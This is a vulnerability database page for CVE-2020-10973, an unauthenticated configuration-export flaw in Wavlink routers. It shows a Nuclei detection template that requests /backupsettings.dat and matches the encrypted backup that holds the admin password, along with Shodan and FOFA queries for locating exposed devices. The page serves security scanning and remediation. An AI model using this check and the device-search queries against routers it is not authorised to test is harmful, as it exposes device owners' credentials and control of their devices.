Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-10973
HistoryAug 14, 2022 - 11:56 a.m.

WAVLINK - Access Control

2022-08-1411:56:35
ProjectDiscovery
github.com
9
wavlink
access control
vulnerability
unauthorized access
sensitive information
authentication
device control

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.025 Low

EPSS

Percentile

90.2%

Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
id: CVE-2020-10973

info:
  name: WAVLINK - Access Control
  author: arafatansari
  severity: high
  description: |
    Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the access control issue.
  reference:
    - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
    - https://github.com/sudo-jtcsec/Nyra
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10973
    - https://github.com/Roni-Carta/nyra
    - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973-affected_devices
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-10973
    cwe-id: CWE-306
    epss-score: 0.02524
    epss-percentile: 0.90149
    cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn530hg4_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,exposure,wavlink

http:
  - raw:
      - |
        GET /backupsettings.dat HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Salted__'

      - type: word
        part: header
        words:
          - application/octet-stream

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dea52dfa4843e4127c3a69e69b04f59de83a94b14134d589172366662c011b200221008fd50c26a4daabf85737b644ba836b227c9df3fb1b9d909708ae4f9bf0b9a476:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.025 Low

EPSS

Percentile

90.2%

Related for NUCLEI:CVE-2020-10973